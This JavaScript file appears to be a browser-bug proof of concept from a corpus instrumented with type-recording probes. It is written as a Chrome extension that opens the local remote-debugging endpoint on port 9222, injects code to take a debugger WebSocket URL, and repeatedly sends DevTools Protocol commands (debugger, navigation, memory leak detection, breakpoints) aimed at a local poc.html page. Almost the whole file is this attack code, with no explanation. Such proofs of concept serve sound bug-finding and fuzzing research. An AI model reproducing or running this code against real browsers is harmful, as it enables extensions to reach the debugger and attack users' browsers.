var Inst0 = 0;
var Inst1 = 0;
var Inst2 = 0;
var Inst3 = 0;
var Inst4 = 0;
var Inst5 = 0;
var Inst6 = 0;
var Inst7 = 0;
var Inst8 = 0;
var Inst9 = 0;
var Inst10 = 0;
var Inst11 = 0;
var Inst12 = 0;
var Inst13 = 0;
var Inst14 = 0;
var Inst15 = 0;
var Inst16 = 0;
var Inst17 = 0;
var Inst18 = 0;
var Inst19 = 0;
var Inst20 = 0;
var Inst21 = 0;
var Inst22 = 0;
var Inst23 = 0;
var Inst24 = 0;
var Inst25 = 0;
var Inst26 = 0;
var Inst27 = 0;
var Inst28 = 0;
var Inst29 = 0;
var Inst30 = 0;
var Inst31 = 0;
var Inst32 = 0;
var Inst33 = 0;
var Inst34 = 0;
var Inst35 = 0;
var Inst36 = 0;
var Inst37 = 0;
var Inst38 = 0;
var Inst39 = 0;
var Inst40 = 0;
var Inst41 = 0;
var Inst42 = 0;
var Inst43 = 0;
var Inst44 = 0;
var Inst45 = 0;
var Inst46 = 0;
var Inst47 = 0;
var Inst48 = 0;
var Inst49 = 0;
var Inst50 = 0;
var Inst51 = 0;
var Inst52 = 0;
var Inst53 = 0;
var Inst54 = 0;
var Inst55 = 0;
var Inst56 = 0;
var Inst57 = 0;
var Inst58 = 0;
var Inst59 = 0;
var Inst60 = 0;
var Inst61 = 0;
var Inst62 = 0;
var Inst63 = 0;
var Inst64 = 0;
var Inst65 = 0;
var Inst66 = 0;
var Inst67 = 0;
var Inst68 = 0;
var Inst69 = 0;
var Inst70 = 0;
var Inst71 = 0;
var Inst72 = 0;
var Inst73 = 0;
var Inst74 = 0;
var Inst75 = 0;
var Inst76 = 0;
var Inst77 = 0;
var Inst78 = 0;
var Inst79 = 0;
var Inst80 = 0;
var Inst81 = 0;
var Inst82 = 0;
var Inst83 = 0;
var Inst84 = 0;
var Inst85 = 0;
var Inst86 = 0;
var Inst87 = 0;
var Inst88 = 0;
var Inst89 = 0;
var Inst90 = 0;
var Inst91 = 0;
var Inst92 = 0;
var Inst93 = 0;
var Inst94 = 0;
var Inst95 = 0;
var Inst96 = 0;
var Inst97 = 0;
var Inst98 = 0;
var Inst99 = 0;
var Inst100 = 0;
var Inst101 = 0;
 
function _TypeOfArray(a) {
	let number = true;	
	let string = true;
	for (let i = 0; i < a.length; i++) {
		if (number && (typeof a[i]) != "number") {
			number = false;	
		}
		if (string && (typeof a[i]) != "string") {
			string = false;	
		}
		if (!number && !string)
			break;
	}
	if (number)
		return "number";
	else if (string)
		return "string";
	else
		return "any";
}

function _TypeIsEqual(t1, t2) {
	return JSON.stringify(t1) === JSON.stringify(t2);
}

function _TypeOf(a, step) {
	var t;
	var type = Object.prototype.toString.call(a).slice(8, -1).toLowerCase();	
	if (type == "array") {
		t = {type : type, extra: {elemType: _TypeOfArray(a)}};
	} else if (type == "object") {
		let shape = [];
        if (step === undefined || step > 0) {
            let keys = Object.keys(a);
            let length = Math.min(100, keys.length);
		    for (let i = 0; i < length; i++) {
			    shape.push([keys[i], _TypeOf(a[keys[i]], step === undefined ? 1 : step - 1)]);	
		    }
        }
		t = {type : type, extra: {shape: shape}};
	} else {
		t = {type : type};
	} 
	return t;
}

function _RecordType(loc, a) {
	var t = _TypeOf(a);
    print("~~~TypeInfo:" + loc + ":" + JSON.stringify(t));
}
try { if (Inst0 <= 1000 && typeof (poc) != "undefined") {_RecordType("<9,12,1>",(poc)); Inst0++; } } catch(e) {}
function poc() {
try { if (Inst2 <= 1000 && typeof (time) != "undefined") {_RecordType("<34,38,2>",(time)); Inst2++; } } catch(e) {}try { if (Inst3 <= 1000 && typeof (Promise) != "undefined") {_RecordType("<47,54,2>",(Promise)); Inst3++; } } catch(e) {}try { if (Inst4 <= 1000 && typeof (resolve) != "undefined") {_RecordType("<56,63,2>",(resolve)); Inst4++; } } catch(e) {}try { if (Inst5 <= 1000 && typeof (setTimeout) != "undefined") {_RecordType("<68,78,2>",(setTimeout)); Inst5++; } } catch(e) {}try { if (Inst6 <= 1000 && typeof (resolve) != "undefined") {_RecordType("<79,86,2>",(resolve)); Inst6++; } } catch(e) {}try { if (Inst7 <= 1000 && typeof (time) != "undefined") {_RecordType("<88,92,2>",(time)); Inst7++; } } catch(e) {}
	const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time));
try { if (Inst1 <= 1000 && typeof (sleep) != "undefined") {_RecordType("<25,30,2>",(sleep)); Inst1++; } } catch(e) {}

try { if (Inst8 <= 1000 && typeof (connect) != "undefined") {_RecordType("<109,116,4>",(connect)); Inst8++; } } catch(e) {}
	function connect(webSocketDebuggerUrl) {
try { if (Inst9 <= 1000 && typeof (webSocketDebuggerUrl) != "undefined") {_RecordType("<117,137,4>",(webSocketDebuggerUrl)); Inst9++; } } catch(e) {}
try { if (Inst10 <= 1000 && typeof (Promise) != "undefined") {_RecordType("<155,162,5>",(Promise)); Inst10++; } } catch(e) {}
		return new Promise(function (resolve, reject) {
try { if (Inst11 <= 1000 && typeof (resolve) != "undefined") {_RecordType("<173,180,5>",(resolve)); Inst11++; } } catch(e) {}try { if (Inst12 <= 1000 && typeof (reject) != "undefined") {_RecordType("<182,188,5>",(reject)); Inst12++; } } catch(e) {}
try { if (Inst14 <= 1000 && typeof (WebSocket) != "undefined") {_RecordType("<213,222,6>",(WebSocket)); Inst14++; } } catch(e) {}try { if (Inst15 <= 1000 && typeof (webSocketDebuggerUrl) != "undefined") {_RecordType("<223,243,6>",(webSocketDebuggerUrl)); Inst15++; } } catch(e) {}
			var server = new WebSocket(webSocketDebuggerUrl);
try { if (Inst13 <= 1000 && typeof (server) != "undefined") {_RecordType("<200,206,6>",(server)); Inst13++; } } catch(e) {}
			server.onopen = function () {
try { if (Inst18 <= 1000 && typeof (resolve) != "undefined") {_RecordType("<285,292,8>",(resolve)); Inst18++; } } catch(e) {}try { if (Inst19 <= 1000 && typeof (server) != "undefined") {_RecordType("<293,299,8>",(server)); Inst19++; } } catch(e) {}
				resolve(server);
			};
try { if (Inst16 <= 1000 && typeof (server.onopen) != "undefined") {_RecordType("<250,263,7>",(server.onopen)); Inst16++; } } catch(e) {}try { if (Inst17 <= 1000 && typeof (server) != "undefined") {_RecordType("<250,256,7>",(server)); Inst17++; } } catch(e) {}
			server.onerror = function (err) {
try { if (Inst22 <= 1000 && typeof (err) != "undefined") {_RecordType("<340,343,10>",(err)); Inst22++; } } catch(e) {}
try { if (Inst23 <= 1000 && typeof (reject) != "undefined") {_RecordType("<352,358,11>",(reject)); Inst23++; } } catch(e) {}try { if (Inst24 <= 1000 && typeof (err) != "undefined") {_RecordType("<359,362,11>",(err)); Inst24++; } } catch(e) {}
				reject(err);
			};
try { if (Inst20 <= 1000 && typeof (server.onerror) != "undefined") {_RecordType("<313,327,10>",(server.onerror)); Inst20++; } } catch(e) {}try { if (Inst21 <= 1000 && typeof (server) != "undefined") {_RecordType("<313,319,10>",(server)); Inst21++; } } catch(e) {}
		});
	}

try { if (Inst25 <= 1000 && typeof (waitForMessage) != "undefined") {_RecordType("<396,410,16>",(waitForMessage)); Inst25++; } } catch(e) {}
	function waitForMessage(ws) {
try { if (Inst26 <= 1000 && typeof (ws) != "undefined") {_RecordType("<411,413,16>",(ws)); Inst26++; } } catch(e) {}
try { if (Inst27 <= 1000 && typeof (Promise) != "undefined") {_RecordType("<431,438,17>",(Promise)); Inst27++; } } catch(e) {}try { if (Inst28 <= 1000 && typeof (resolve) != "undefined") {_RecordType("<440,447,17>",(resolve)); Inst28++; } } catch(e) {}
		return new Promise((resolve) => {
try { if (Inst31 <= 1000 && typeof (message) != "undefined") {_RecordType("<474,481,18>",(message)); Inst31++; } } catch(e) {}
			ws.onmessage = (message) => {
try { if (Inst32 <= 1000 && typeof (resolve) != "undefined") {_RecordType("<493,500,19>",(resolve)); Inst32++; } } catch(e) {}try { if (Inst33 <= 1000 && typeof (message) != "undefined") {_RecordType("<501,508,19>",(message)); Inst33++; } } catch(e) {}
				resolve(message);
			};
try { if (Inst29 <= 1000 && typeof (ws.onmessage) != "undefined") {_RecordType("<458,470,18>",(ws.onmessage)); Inst29++; } } catch(e) {}try { if (Inst30 <= 1000 && typeof (ws) != "undefined") {_RecordType("<458,460,18>",(ws)); Inst30++; } } catch(e) {}
		});
	}

try { if (Inst34 <= 1000 && typeof (run) != "undefined") {_RecordType("<548,551,24>",(run)); Inst34++; } } catch(e) {}
	async function run(ws_url) {
try { if (Inst35 <= 1000 && typeof (ws_url) != "undefined") {_RecordType("<552,558,24>",(ws_url)); Inst35++; } } catch(e) {}
		try {
try { if (Inst37 <= 1000 && typeof (connect) != "undefined") {_RecordType("<592,599,26>",(connect)); Inst37++; } } catch(e) {}try { if (Inst38 <= 1000 && typeof (ws_url) != "undefined") {_RecordType("<600,606,26>",(ws_url)); Inst38++; } } catch(e) {}
			const ws = await connect(ws_url);
try { if (Inst36 <= 1000 && typeof (ws) != "undefined") {_RecordType("<581,583,26>",(ws)); Inst36++; } } catch(e) {}

try { if (Inst39 <= 1000 && typeof (ws.send) != "undefined") {_RecordType("<615,622,28>",(ws.send)); Inst39++; } } catch(e) {}try { if (Inst40 <= 1000 && typeof (ws) != "undefined") {_RecordType("<615,617,28>",(ws)); Inst40++; } } catch(e) {}
			ws.send(
				'{"id": 0, "method": "Debugger.enable", "params": {"maxScriptsCacheSize": 100}}'
			);
try { if (Inst41 <= 1000 && typeof (waitForMessage) != "undefined") {_RecordType("<727,741,31>",(waitForMessage)); Inst41++; } } catch(e) {}try { if (Inst42 <= 1000 && typeof (ws) != "undefined") {_RecordType("<742,744,31>",(ws)); Inst42++; } } catch(e) {}
			await waitForMessage(ws);
try { if (Inst43 <= 1000 && typeof (sleep) != "undefined") {_RecordType("<757,762,32>",(sleep)); Inst43++; } } catch(e) {}
			await sleep(200)

try { if (Inst44 <= 1000 && typeof (ws.send) != "undefined") {_RecordType("<774,781,34>",(ws.send)); Inst44++; } } catch(e) {}try { if (Inst45 <= 1000 && typeof (ws) != "undefined") {_RecordType("<774,776,34>",(ws)); Inst45++; } } catch(e) {}
			ws.send(
				'{"id": 1, "method": "Page.navigate", "params": {"url": "http://localhost:8080/poc.html"}}'
			);
try { if (Inst46 <= 1000 && typeof (waitForMessage) != "undefined") {_RecordType("<897,911,37>",(waitForMessage)); Inst46++; } } catch(e) {}try { if (Inst47 <= 1000 && typeof (ws) != "undefined") {_RecordType("<912,914,37>",(ws)); Inst47++; } } catch(e) {}
			await waitForMessage(ws);
try { if (Inst48 <= 1000 && typeof (sleep) != "undefined") {_RecordType("<927,932,38>",(sleep)); Inst48++; } } catch(e) {}
			await sleep(200);

try { if (Inst49 <= 1000 && typeof (ws.send) != "undefined") {_RecordType("<945,952,40>",(ws.send)); Inst49++; } } catch(e) {}try { if (Inst50 <= 1000 && typeof (ws) != "undefined") {_RecordType("<945,947,40>",(ws)); Inst50++; } } catch(e) {}
			ws.send(
				'{"id": 2, "method": "Debugger.setPauseOnExceptions", "params": {"state": "uncaught"}}'
			);
try { if (Inst51 <= 1000 && typeof (waitForMessage) != "undefined") {_RecordType("<1064,1078,43>",(waitForMessage)); Inst51++; } } catch(e) {}try { if (Inst52 <= 1000 && typeof (ws) != "undefined") {_RecordType("<1079,1081,43>",(ws)); Inst52++; } } catch(e) {}
			await waitForMessage(ws);
try { if (Inst53 <= 1000 && typeof (sleep) != "undefined") {_RecordType("<1094,1099,44>",(sleep)); Inst53++; } } catch(e) {}
			await sleep(200)

try { if (Inst54 <= 1000 && typeof (ws.send) != "undefined") {_RecordType("<1111,1118,46>",(ws.send)); Inst54++; } } catch(e) {}try { if (Inst55 <= 1000 && typeof (ws) != "undefined") {_RecordType("<1111,1113,46>",(ws)); Inst55++; } } catch(e) {}
			ws.send(
				'{"id": 3, "method": "Memory.prepareForLeakDetection", "params": {}}'
			);
try { if (Inst56 <= 1000 && typeof (waitForMessage) != "undefined") {_RecordType("<1212,1226,49>",(waitForMessage)); Inst56++; } } catch(e) {}try { if (Inst57 <= 1000 && typeof (ws) != "undefined") {_RecordType("<1227,1229,49>",(ws)); Inst57++; } } catch(e) {}
			await waitForMessage(ws);
try { if (Inst58 <= 1000 && typeof (sleep) != "undefined") {_RecordType("<1242,1247,50>",(sleep)); Inst58++; } } catch(e) {}
			await sleep(200);

try { if (Inst59 <= 1000 && typeof (ws.send) != "undefined") {_RecordType("<1260,1267,52>",(ws.send)); Inst59++; } } catch(e) {}try { if (Inst60 <= 1000 && typeof (ws) != "undefined") {_RecordType("<1260,1262,52>",(ws)); Inst60++; } } catch(e) {}
			ws.send(
				'{"id": 4, "method": "Debugger.setBreakpointByUrl", "params": {"lineNumber": 1, "urlRegex": "http://localhost:8080/poc.html"}}'
			);
try { if (Inst61 <= 1000 && typeof (waitForMessage) != "undefined") {_RecordType("<1419,1433,55>",(waitForMessage)); Inst61++; } } catch(e) {}try { if (Inst62 <= 1000 && typeof (ws) != "undefined") {_RecordType("<1434,1436,55>",(ws)); Inst62++; } } catch(e) {}
			await waitForMessage(ws);

try { if (Inst63 <= 1000 && typeof (ws.close) != "undefined") {_RecordType("<1445,1453,57>",(ws.close)); Inst63++; } } catch(e) {}try { if (Inst64 <= 1000 && typeof (ws) != "undefined") {_RecordType("<1445,1447,57>",(ws)); Inst64++; } } catch(e) {}
			ws.close();
		} catch {}
	}

	for (const dbg of JSON.parse(
		document.querySelector("body > pre").innerText
	)) {
try { if (Inst65 <= 1000 && typeof (dbg) != "undefined") {_RecordType("<1490,1493,61>",(dbg)); Inst65++; } } catch(e) {}try { if (Inst66 <= 1000 && typeof (JSON.parse) != "undefined") {_RecordType("<1497,1507,61>",(JSON.parse)); Inst66++; } } catch(e) {}try { if (Inst67 <= 1000 && typeof (JSON) != "undefined") {_RecordType("<1497,1501,61>",(JSON)); Inst67++; } } catch(e) {}try { if (Inst68 <= 1000 && typeof (document.querySelector("body > pre").innerText) != "undefined") {_RecordType("<1512,1558,62>",(document.querySelector("body > pre").innerText)); Inst68++; } } catch(e) {}try { if (Inst69 <= 1000 && typeof (document.querySelector) != "undefined") {_RecordType("<1512,1534,62>",(document.querySelector)); Inst69++; } } catch(e) {}try { if (Inst70 <= 1000 && typeof (document) != "undefined") {_RecordType("<1512,1520,62>",(document)); Inst70++; } } catch(e) {}
try { if (Inst71 <= 1000 && typeof (dbg["url"]) != "undefined") {_RecordType("<1573,1583,64>",(dbg["url"])); Inst71++; } } catch(e) {}try { if (Inst72 <= 1000 && typeof (dbg) != "undefined") {_RecordType("<1573,1576,64>",(dbg)); Inst72++; } } catch(e) {}
		if (dbg["url"] == "about:blank") {
try { if (Inst74 <= 1000 && typeof (dbg["webSocketDebuggerUrl"]) != "undefined") {_RecordType("<1617,1644,65>",(dbg["webSocketDebuggerUrl"])); Inst74++; } } catch(e) {}try { if (Inst75 <= 1000 && typeof (dbg) != "undefined") {_RecordType("<1617,1620,65>",(dbg)); Inst75++; } } catch(e) {}
			ws_url = dbg["webSocketDebuggerUrl"];
try { if (Inst73 <= 1000 && typeof (ws_url) != "undefined") {_RecordType("<1608,1614,65>",(ws_url)); Inst73++; } } catch(e) {}
		}
	}

try { if (Inst76 <= 1000 && typeof (setInterval) != "undefined") {_RecordType("<1659,1670,69>",(setInterval)); Inst76++; } } catch(e) {}
	setInterval(() => {
try { if (Inst77 <= 1000 && typeof (run) != "undefined") {_RecordType("<1682,1685,70>",(run)); Inst77++; } } catch(e) {}try { if (Inst78 <= 1000 && typeof (ws_url) != "undefined") {_RecordType("<1686,1692,70>",(ws_url)); Inst78++; } } catch(e) {}
		run(ws_url);
	}, 500);
}

try { if (Inst79 <= 1000 && typeof (chrome.tabs.onUpdated.addListener) != "undefined") {_RecordType("<1712,1745,74>",(chrome.tabs.onUpdated.addListener)); Inst79++; } } catch(e) {}try { if (Inst80 <= 1000 && typeof (chrome.tabs.onUpdated) != "undefined") {_RecordType("<1712,1733,74>",(chrome.tabs.onUpdated)); Inst80++; } } catch(e) {}try { if (Inst81 <= 1000 && typeof (chrome.tabs) != "undefined") {_RecordType("<1712,1723,74>",(chrome.tabs)); Inst81++; } } catch(e) {}try { if (Inst82 <= 1000 && typeof (chrome) != "undefined") {_RecordType("<1712,1718,74>",(chrome)); Inst82++; } } catch(e) {}
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
try { if (Inst83 <= 1000 && typeof (tabId) != "undefined") {_RecordType("<1756,1761,74>",(tabId)); Inst83++; } } catch(e) {}try { if (Inst84 <= 1000 && typeof (info) != "undefined") {_RecordType("<1763,1767,74>",(info)); Inst84++; } } catch(e) {}try { if (Inst85 <= 1000 && typeof (tab) != "undefined") {_RecordType("<1769,1772,74>",(tab)); Inst85++; } } catch(e) {}
try { if (Inst86 <= 1000 && typeof (info.status) != "undefined") {_RecordType("<1785,1796,75>",(info.status)); Inst86++; } } catch(e) {}try { if (Inst87 <= 1000 && typeof (info) != "undefined") {_RecordType("<1785,1789,75>",(info)); Inst87++; } } catch(e) {}try { if (Inst88 <= 1000 && typeof (tab.url.indexOf) != "undefined") {_RecordType("<1814,1829,75>",(tab.url.indexOf)); Inst88++; } } catch(e) {}try { if (Inst89 <= 1000 && typeof (tab.url) != "undefined") {_RecordType("<1814,1821,75>",(tab.url)); Inst89++; } } catch(e) {}try { if (Inst90 <= 1000 && typeof (tab) != "undefined") {_RecordType("<1814,1817,75>",(tab)); Inst90++; } } catch(e) {}
    if (info.status == "complete" && tab.url.indexOf("http://localhost:9222") == 0) {
try { if (Inst91 <= 1000 && typeof (chrome.scripting.executeScript) != "undefined") {_RecordType("<1872,1902,76>",(chrome.scripting.executeScript)); Inst91++; } } catch(e) {}try { if (Inst92 <= 1000 && typeof (chrome.scripting) != "undefined") {_RecordType("<1872,1888,76>",(chrome.scripting)); Inst92++; } } catch(e) {}try { if (Inst93 <= 1000 && typeof (chrome) != "undefined") {_RecordType("<1872,1878,76>",(chrome)); Inst93++; } } catch(e) {}try { if (Inst94 <= 1000 && typeof (tabId) != "undefined") {_RecordType("<1922,1927,76>",(tabId)); Inst94++; } } catch(e) {}try { if (Inst95 <= 1000 && typeof (poc) != "undefined") {_RecordType("<1937,1940,76>",(poc)); Inst95++; } } catch(e) {}
        chrome.scripting.executeScript({ target: { tabId: tabId }, func: poc });
    }
})

try { if (Inst96 <= 1000 && typeof (chrome.tabs.create) != "undefined") {_RecordType("<1959,1977,80>",(chrome.tabs.create)); Inst96++; } } catch(e) {}try { if (Inst97 <= 1000 && typeof (chrome.tabs) != "undefined") {_RecordType("<1959,1970,80>",(chrome.tabs)); Inst97++; } } catch(e) {}try { if (Inst98 <= 1000 && typeof (chrome) != "undefined") {_RecordType("<1959,1965,80>",(chrome)); Inst98++; } } catch(e) {}
chrome.tabs.create({ url: "about:blank" }, () => {
try { if (Inst99 <= 1000 && typeof (chrome.tabs.create) != "undefined") {_RecordType("<2015,2033,81>",(chrome.tabs.create)); Inst99++; } } catch(e) {}try { if (Inst100 <= 1000 && typeof (chrome.tabs) != "undefined") {_RecordType("<2015,2026,81>",(chrome.tabs)); Inst100++; } } catch(e) {}try { if (Inst101 <= 1000 && typeof (chrome) != "undefined") {_RecordType("<2015,2021,81>",(chrome)); Inst101++; } } catch(e) {}
    chrome.tabs.create({ url: "http://localhost:9222/json" , active: false}, null);
});
